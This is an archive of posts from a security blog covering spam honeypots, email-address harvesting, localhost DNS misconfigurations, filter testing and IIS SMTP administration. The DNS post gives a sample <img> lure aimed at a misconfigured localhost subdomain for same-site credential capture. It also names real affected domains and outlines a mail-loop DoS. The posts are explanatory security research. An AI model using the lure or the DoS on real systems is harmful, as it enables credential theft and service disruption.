onHacks

This is a report more than discovery in spam collection. I was working on setting up a spampot using spampot.py which was written by Neale Pikett back to 2003. Although the result is not as my expectation, it does gives me more information about setting up a spampot.

Goal

The goal of running a spampot (honeypot which only care about spam) is to collect spam and analysis the trend of them, hopefully we can find some interesting techniques that spammers/ hackers use in junk and phishing emails.

Approach
So far, there are at least two types of spampot hosting method that I know. The names of them are designed by me, if there are formal names for them, please let me know.

Open Relay Spampot: This kind of honeypot is running as an open mail relay server. In case you are not familiar with, open relay means users can send message through the server anonymously.

Close Relay Spampot: The spampot is running as a close mail relay server. To expose the server to spammers, you need to have your own domain binding to this server with email address(es) exposing to spammers/ hackers. For example, we can have onhacks.org binding to a spampot and spam@onhacks.org is one of the email address we want to expose to spammers. However, about the methods to increase the exposure of an email addresses is out of scope, we can discuss more on it later.

In my setup, I decided to run spampot as open mail relay server.

Setup
I have VirtualBox installed on top of Windows 7. I am using Ubuntu as the guest OS, this is because it seems the implementation was done in *nix system. Since port 25 is the default port for SMTP service, we need to forward packets from host (Win7) to guest (Ubuntu) so that the spampot in guest OS can react to incoming connection at host port 25.

(Assuming that you are using NAT for VirtualBox)
To enable port forwarding, you need to set the HostPort 25 forwarding to GuestPort 25. For more detail around port forwarding in VirtualBox, please refer to this article.

However, you will soon discover that it is not possible to perform port forwarding if the port is reserved (< 1024). This can easily be resolved by running VirtualBox with admin credential (ie. Run As Administrator).

The spampot.py requires Sendmail being installed in Linux. Since sendmail actually is a service listening to port 25, I will do the follow to switch to spampot.py:

sudo /etc/init.d/sendmail stop
sudo spampot.py 0.0.0.0

Surely you can set this automatically run when the system is started.

The last thing is to add a DNS record pointing to my machine. I have smtp.onhacks.org. pointing to it. Since it is still under experiment, the machine is running at home and IP is dynamic, I need to change it often.

Result
Currently, I got 0 message after running the spampot for few days. I have google around and looks like open relay spampot is not that popular anymore because many server admins aware that spammers were abusing open mail relay servers, they don’t allow open relay anymore. As a result, submitting spams to open relay servers is not efficient anymore.

I will continue running the spampot these days and see if we can get more spam through open relay honeypot. Afterward, I will work on close relay spampot.

Reference

1. Open mail relay – Wikipedia
2. spampot.py – written by Neale Pickett
3. Configure Port Forwarding to a VirtualBox Guest OS – Tombuntu
4. SpamPots Project – Cert.org
5. Brazilian Honeypots Alliance

Email, Honeypot, Spampot

I disappeared again after my last post talking about spam collections and DNS misconfigurations. Today, I read log0’s post which he is calling for bots/ tools for his security research. Did you see anything familiar to you? How log0 is showing his contact to us, “log0 [ at ] gmail [ dot ] com”. We were using this format for quite some time, after we realized that showing full form of our address (eg. spam@onhacks.org) increases the chance that our email get exposed to spammers.

However, these kinds of representation already appeared on the Internet for last few years. Did you ever think of one fact is that: A clever spammers just need to modify few lines of code in their bots, changing the target strings they are looking for, then everything is just working as the same as in the past.

The most interesting thing is that RSnake has blogged his finding on this form of email representation last Tuesday. In short, he has googled with “at gmail dot com”, and surprisingly there are at least 6 email addresses in the first result page. There are many variations, but they all have the same pattern, here are some examples:

spam  at  onhacks  dot  com
spam [at] onhacks [dot] com
spam (at) onhacks (dot) com
spam <at> onhacks <dot> com
spam “at” onhacks “dot” com

(Obviously, I am trying my best to let spammers know my address)

I spent an hour to write a very simple PoC parser to retrieve email addresses from the result page mentioned above. Obviously there are at least 4 valid email addresses, it is not too hard to get those email addresses by bots. The parser is just looking for 1 ‘at’ and 1 ‘dot’ keyword appears sequentially in the pattern: [any word] “at” [any word] “dot” [any word]. The code is poorly written, I will improve it later this week.

It is not so difficult to discover the pattern between these email addresses, just a piece of cake even for primary students. Then, what kind of representation we should use to show our email address on the Internet? Display the jpeg of the email? Without adding noises to the image, it is as easy as just performing text recognition. With noises on the image, it is more like CAPTCHA. Since most of the CAPTCHA solver aims on specific type of CAPTCHA, it may takes more time to decrypt an “encrypted” email using CAPTCHA. However, it is not unsolvable.

What is the takeaway then? Better not showing your address on web! Or encrypt it into CAPTCHA, at least your email address has less chance being captured by spammers.

Email Email, Gmail, Spam

It is a long time after my last post. I was disappearing because the project I am working on is going to be shipped soon, busying with finding bugs and fixing test cases these few months.

Anyway, let’s get back to a security discussion today. I was playing around with testing DNS resolver feature in my product, DNS is always a great place to play with. When I was looking for any interesting scenarios that can test the feature, I found this article. Although it is an old news, the problem is still in the wild.

DNS Misconfiguration

Many administrators like to install “localhost. IN A 127.0.0.1″ as a record in their DNS server. However, administrators always mistakenly drop the trailing dot (ie. “localhost IN A 127.0.0.1″). Since they put this record into a DNS zone (eg. yahoo.com), the record actually becomes “localhost.yahoo.com. IN A 127.0.0.1″! In other words, when you nslookup “localhost.yahoo.com”, it gives you 127.0.0.1!

I found that there are still many such misconfiguration in the wild. Here are some example:

localhost.fbi.gov gives IP address 127.0.0.1
localhost.domain.ca gives IP address 127.0.0.1
localhost.gov.za gives IP address 127.0.0.1
localhost.cancer.gov gives IP address 127.0.0.1

Application

Same-Site Scripting attack

It is trivial that hackers can take advantage of these mis-configured DNS records on multi-user system. Consider there are two users log0 and .hac in a *nux system, .hac can write a piece of program bind on a port (eg. 1024) of the system. Afterward, .hac sends an email to log0, pretends showing some interesting stuffs from fbi.gov, for example, an image with unknown symbols (ie. an <img> tag in the mail, <img src=”http://localhost.fbi.gov:1024/symbols.jpeg” />). Imagine what will happen when log0 is going to read the message? Yes! The browser will resolve localhost.fbi.gov which is pointing to 127.0.0.1, and connect to 127.0.0.1:1024 to grab the image. Wow, your program should be able to grab credentials of log0 by looking at the HTTP request. This is called same-site scripting attack, already mentioned in the article.

Possible (D)DoS attack

Same-site scripting attack is against a client, there is another possible one against the server. Consider a mail system (eg. gmail.com), it accepts message submitted by their users to anyone in the wild. However, the system never know whom it should connect to and get the message delivered until it resolve the address of the domain. What will happen if we submit a message with recipient none@localhost.gov.za (localhost.gov.za is pointing to 127.0.0.1)? The mail flow is like the following:

1. Message submitted: MAIL FROM: evil@gmail.com, RCPT TO: non@localhost.gov.za
2. Gmail receive and resolve address of localhost.gov.za (localhost.gov.za. IN A 127.0.0.1 as response)
3. Depends on the implementation, it may go back to
   Step 1, which mean the message is resubmitted to the same server;
   Step 2, the server rejects the message, marks it as failed to submit and going to retry;
   Otherwise, detected loopback address and drop the message due to security concern.

The security concern is actually DoS attack, if the system allows to go back to step 1 or 2, the message actually gets stuck in the mail system. Hackers can submit thousands or millions of this message to increase the work load of the mail system, and finally it is DoS. I mentioned that it may be DDoS because the mail system may have mechanism to limit total number of submission per user per hour, hacker needs to have multiple mailboxes to achieve the goal.

I have tested some famous email system, Gmail, Hotmail and Exchange 2010. Here are some brief observation:

Gmail: Accepts the first submission of message with recipient has loopback address. However, it refuses to accept a message from the same origin, which means resubmitting the message is not allowed. The system marks the message as failed and attempt to retry it within 3 days.

Hotmail: Similar with Gmail, but it only retry in 2 days.

Exchange 2010: If it is a loopback address, the server will drop it and give NDR with security concern as a reason.

It is obvious that this kind of misconfiguration in DNS server can cause many attacks to both client and server, I believe that there should be more interesting usage of DNS records pointing to 127.0.0.1. Let me know if you have any interesting scenarios.

Remember: localhost. IN A 127.0.0.1 (If you are not doing evil thing. )

Reference:

• common dns misconfiguration can lead to “same site” scripting
• RFC2109 – HTTP State Management Mechanism

DNS, Email, Protocol

Please give me your spam, instant messenger spam, phishing spam, etc, to spam@onhacks.org .

Yes, we will be reading them!

Thank you.

Email, Honeypot Spamtrap

Testing something is always a good practice before learning how to hack something, the methodologies we use in testing sometimes are applicable in hacking. So, I am planning to write some entries related to testing in the coming few months. See if we can have discover a systematic way to hack. Here is the first challenge, it is very simple.

Problem
Network managers always want to or are forced to control the information flowing around a network. Most of the time, filtering is a good way to do the control. Inside this big category, we always like to use block list to prevent information comes in or goes out, to and from the network.

Scenarios
Flora doesn’t want her daughter wallow in Japan pop star. Flora knows that her daughter always navigate to some sites with domain name ending as ‘.jp’, she is looking for a tool that can control what kinds of websites their PC can reach.

IT administrator in PC middle school discovered that their mail system started receiving porn advertisement and students are trying to share these links through the mail system, they are planning to have a filter that can block all such mail flows.

Justin loves blogging so much, he is writing them weekly. He loves to collect and read feedbacks from the audiences. However, he hates those spammer pasting unrelated advertisement on his posts. He want to figure out a way to stop them appearing from other audiences.

Solution
The trivial filtering solution to help these people out is bad word filtering. The basic idea is the same as general block list, users can specify the tokens they want to look for when deciding to block the information. In general, there are at least two different definitions to distinguish whether we found the bad word or not. Given an input message M,

1. Split the message M into a sequence of words Ws, we found a bad word bW is in the message only if Ws contains bW.
2. Take the message M as an input stream, we found a bad word bW when there is a list of consecutive characters equals bW.

Both definition has there own advantages and disadvantages, but we will keep this discussion later since the current topic is how to test the filter. Let’s say we pick the first definition for our filter, then what should we test? (Take some time to think about scenarios before continue reading)

Functional Test
According the input of this filter (input message M), we can design few functional test cases. Basic scenarios are,

• empty message [Expected: Accept];
• only a word (either good or bad word) [Expected: good - Accept, bad - Reject];
• two words (good and bad) with different delimiter [Expected: Depends on how the feature define delimiter];
• a list of word and contains (0, 1, 2, all) bad words [Expected: all reject];
• a bad word is embedded in a word (eg. assume evil is bad word, message conatins residentevil.com) [Expect: By design, this message will be accepted]

Beside these functional test cases, we should to have a lengthy message to check boundary cases of the feature. Assume the longest message we accept is N characters, we need to have message with length N, N+1 and N+2. On the other hand, globalization and localization test may be required, depends on who is your target user.

Security Concern
Then we would ask: is there other way to bypass the filter (eg. message using different encoding)? Is it possible to have code injection or script injection attack? Who can use the feature? Where is the bad word list? Who have rights to touch the list? These are security concerns when testing the feature. Drawing a data flow diagram always help to identify what kind of security issues we may have. However, this post only focus on functional testing a feature. May be next time we can discuss how to design security test cases of a feature.

Conclusion
We have only discussed some elementary skills to design the test plan of a feature. You can consider what kind of input the feature can have, both valid and invalid input. Output is another way to discover new scenarios, output is anything that the feature shown. Since we assumed that this filter only say accept or reject of a message and throw some exceptions (eg. input size exceed), the test cases we found here are almost dominated by what we found with the input. Now, you are able to test your program more systematically!

Have a good weekend!

Practice (Just for fun)
Should you want to have some practice, we can discuss how to test an IP block list filter. Here is a simple definition:

INPUT: Only allow IPv4 address, one at a time
IMPLEMENTATION: An IP block list is stored as a text file in the same folder of the filter, user need to directly modify the text file if he want to Add/Remove/Edit an IP address in the block list. The filter will perform a binary search to see if the input address is on the list. If it is, then it will announce reject, otherwise output accept.
OUTPUT: Accept/ Reject the address

Email, Testing Analysis, Black box, Email, Filtering, Testing

LP gave a very good reply to the topic of “encrypt-and-compress” or “compress-and-encrypt” , and it is worth highlighting here.

The reason why compression works is that the plaintext contains redundancy. E.g. there are certain patterns in the text, character frequencies are not uniform, etc.

On the other hand, a good encryption algorithm should exhibit good diffusion and confusion. In short, it means that encrypted data should be indistinguishable from random noise. It is obvious that this property should hold regardless of the plaintext, otherwise the encryption algorithm is broken.

Therefore, compress-and-encrypt produces smaller output with no security compromise per se, but encrypt-and-compress is like feeding random noise (whose redundancy is greatly reduced) into the compression algorithm with no obvious security benefit.

In short, encrypt-and-compress poses no obvious security benefit. Moreover, given that a good compression algorithm should be like real noise, and should not contain pattern, it follows that there will be no obvious storage benefit, either.

Email, Protocol Compression, Email, Security

Yes, not really security related again. I think Mdutil is very useful and powerful, but there is too limited resources discussing use of it, so I want to talk a little bit more about my experience of using it. I am still working with IIS SMTP this time, because I have many test cases need to interact with SMTP server, and IIS SMTP is the “simplest” server that suit our requirement. Unfortunately, IIS virtual SMTP server is too simple that you cannot find a way to configure the advanced features in the given UI. (You can download IIS Resources Toolkit (eg. IIS6) to gain access to these configurations). This time, my task is to add some routing domains (around 30) to the virtual SMTP server. If you tried to add routing domains to virtual SMTP server through IIS Manager, you will know how painful it is if you need to add many routing domains at the same time. So we have Mdutil to modify the metabase keys, a list of routing domains that we need to add, and I am planning to write some code to generate scripts (more accurate, a list of Mdutil commands) to add these domains.

First of all, we need to know how the structure of domains stored in metabase before designing the scripts to add a routing domain. Let’s manually add a routing domain (eg. log0.onhacks.org) to the server through IIS Manager. After that, run the command to see what happened in the Domain path. Remeber the command?

mdutil enum -path:smtpsvc/<n>/Domain

Then you will see output similar to the following:

KeyType : [S] <String> “IIsSmtpDomain”
[smtpsvc/<n>/Domain/log0.onhacks.org]

Which means when adding a new routing domain, the SMTP server will create a child under Domain. Is this child contain no data? Obviously not! Because there are two types of routing domain that we can create in IIS SMTP server, Local (ie. Alias) and Remote. So, at least, there is a data stored in this child. By running the following command,

mdutil enum -path:smtpsvc/<n>/Domain/log0.onhacks.org

Since I added this domain with Alias type. You will get the result as following:

KeyType : [S] <String> “IIsSmtpDomain”
36946 : [IS] <DWORD> 0×10 = {16}

It matchs what we expect and no extra value need to be added in this branch. By the observation, we should have at least 3 mdutil commands to add a new branch under smtpsvc/<n>/Domain. We should first take a look on the operations provided by mdutil. Type in mdutil without arguments, you should see the help of mdutil. Following is the highlight of commands that may be useful for our task.

mdutil SET      path value …   – assign the new value
mdutil CREATE   path             – create given path

After a little experiment, I discover that CREATE operation is used to create a new branch, and by using SET, we can add a new variable in the node. So the steps to import a routing domain is as follow (eg. Import dotHac.onhacks.org).

Create a branch:

mdutil CREATE -path:smtpsvc/<n>/Domain/dotHac.onhacks.org

Add a variable KeyType to the branch:

mdutil SET -path:smtpsvc/<n>/Domain/dotHac.onhacks.org -prop:KeyType -utype:UT_SERVER -dtype:STRING -value:”IIsSmtpDomain”

Add a variable for the routing action (value: 16 = local domain, 2 = remote domain):

mdutil SET -path:smtpsvc/<n>/Domain/dotHac.onhacks.org -prop:36946 -utype:UT_SERVER -dtype:DWORD -value:16

When you open IIS manager, you will see the domain has been imported. Pretty cool, isn’t it? The next step is to generate a list of mdutil commands for batch import. My approach is to read list of the domains and its routing action into a program and the program will generate mdutil commands for each them. Here is an example in Python version.

Enjoy! Happy New Year!

ps. Is anyone know if we can use mdutil to access properties of DNS server? I would like to switch on/off the DNS referral feature in Windows DNS server.

Email, Windows IIS, Mdutil, Routing Domain, SMTP

Simple Mail Transport Protocol (SMTP) is the basic protocol for message delivery in the network. As you know, it is the simplest protocol, you can imagine it is so simple that without considering much on security. However, I am not going to discuss the bugs in the specification, but I do want to cover some non-security related stuffs which is related to Extended SMTP (ESMTP). After RFC of SMTP was published, people noticed that SMTP is not enough to fulfil their requirements for mail delivery. They started designing extensions for SMTP, most commonly use extensions are: Delivery Status Notification (DSN), Transport Layer Security (STARTTLS), Authenticated SMTP (SMTP-AUTH) and SIZE.

These few days, I am looking around to disable some extensions in IIS virtual SMTP server. In more accurate, it is an ESMTP server. If you have tried setting up an IIS virtual SMTP server by yourself, you should know that there is no GUI for you to disable these extensions. However, if you search on the Internet, there are at least two ways to enable/ disable these extensions. One of them is to use Windows Script (WScript) to take the SMTP server as an object and, by assigning the value to different properties to configure the extensions. On the other hand, you can use Mdutil.exe to edit the metabase key that let the SMTP advertise the extensions. In this entry, I am going to cover the detail of how to use Mdutil.exe to modify the key.

Mdutil.exe is a metabase key editor. By default, mdutil.exe is not installed in the Windows. You can search it in the install CD. In Windows 2000 CD, the name of it is Mdutil.ex_, you can move it to your computer and rename it. After that, you should first determine how many SMTP Virtual Server instances are configured. You can do this by using the following command:

Mdutil.exe enum -path:smtpsvc

You are suppose to see something similar to the following:

• [/smtpsvc/1]
• [/smtpsvc/2]
• [/smtpsvc/3]

Each entry represents an virtual SMTP server instance. You must look in the Microsoft Management Console (MMC) to find the virtual SMTP server instance that you want to modify. The virtual SMTP server instances are listed from top to bottom.
asdf
You can use the following command to obtain the original property value, while <n> is the number of the SMTP server instance that you want to modify.

Mdutil.exe get -path:smtpsvc/<n> -prop:36998

If you receive the error message: “Error: GetData – HRES(0×800cc801) MD_ERROR_DATA_NOT_FOUND”, the metabase property 36998 is not stored in the properties of this SMTP server instance.Otherwise, you will have the response of the value like this:

36998 : [IS] (DWORD) 0×7574c1={7697601}

Then we should take a look which extensions we can configure.

Then the rule is very simple: If you want to disable an advertisement, just subtract its corresponding value from the original property value; If you want to enable an advertisement, add its value to the original property value. For example, the original value is 0×7574c1 and I want to disable DSN (by default DSN is enabled, the original property value is the sum of some of the advertisements), you can set the property value to 0×7574c1 – 0×40 = 0×757481. To assign the new value to it, you can perform the following command.

Mdutil.exe set -path:smtpsvc/ -prop:36998 -utype:UT_SERVER -dtype:DWORD -attrib:INHERIT -value:0×757481

By replacing the -value attribute, you can set the property at 36998 to different value. Then you can connect to your SMTP server and see the new list of extensions by typing EHLO.

It is just a very breif introduction to Mdutil.exe, I think it has a great power to modify other metabase key of applications in Windows.

Hope you enjoy!

Reference:

• How to turn off 8BITMIME in Windows 2000 and in Windows Server 2003 SMTP service
• Microsoft Exchange Server 2003 Advanced Administration

Email, Windows ESMTP, IIS, Mdutil

There is a huge amount of mails flowing between different email servers everyday. At the same time, in the real world, in most countries, bandwidth is a measurement of your bill. If you are the host of an email server, you may always want to minimize the bandwidth you use. The trivial solution is to use compression when the server delivers messages. Compression is a very general technique that we use to minimize the storage size of data, there are two main different categories, lossless and lossy. When we compressing email messages, lossless compression must be used to make sure the data is complete after the compression-decompression process. In Request for Comments (RFC), there are few famous lossless compression methods deployed for compressing different protocols (eg. TLS, PPP), they are DEFLATE, Gzip and LZW. Of course, there are still some non-standardized compression methods for protocol.

Email server should use a secure channel when it is delivering sensitive messages. In general, we should use a secure channel when transmitting data in the network. To simplify the procedure, Transport Layer Security (TLS) is one of the way to provide a secure channel during transmission. TLS is a stateful cryptographic protocol to decide the asymmetric key that sender and receiver use during the communication.

Finally, after you reading the long introduction, now I would like to raise a question. If I want to both minimize the bandwidth the transmission used and secure the transmission, I have to compress and encrypt the data before deliver it, what is the difference between compress-encrypt (Compressed data in secure channel) and encrypt-compress (Encrypted data in compression channel)? What are the advantages and disadvantages of these two approach? IMO, compress-encrypt may be more secure because encryption function encapsulated the whole message. Although encrypt-compress is secure, it may expose the length of the message when looking at the compression history. Both required the input block size of compression and encryption be the same, otherwise buffering is required for the transmission. The advantage of encrypt-compress is we can guarantee that the compressing block size is fixed, since in most cases, we use public key encryption method which has block size of 2ⁿ bits.

There are some existed compression standard for encryption protocol (eg. TLS compression). Feel free to take a look, may be you can come up some ideas of the advantages and disadvantages of these two different approaches. I am looking forward to have discussion with you on these approaches.

Thoughts, comments, and suggestions are always welcome!

Email Compression, Encryption, SMTP, TLS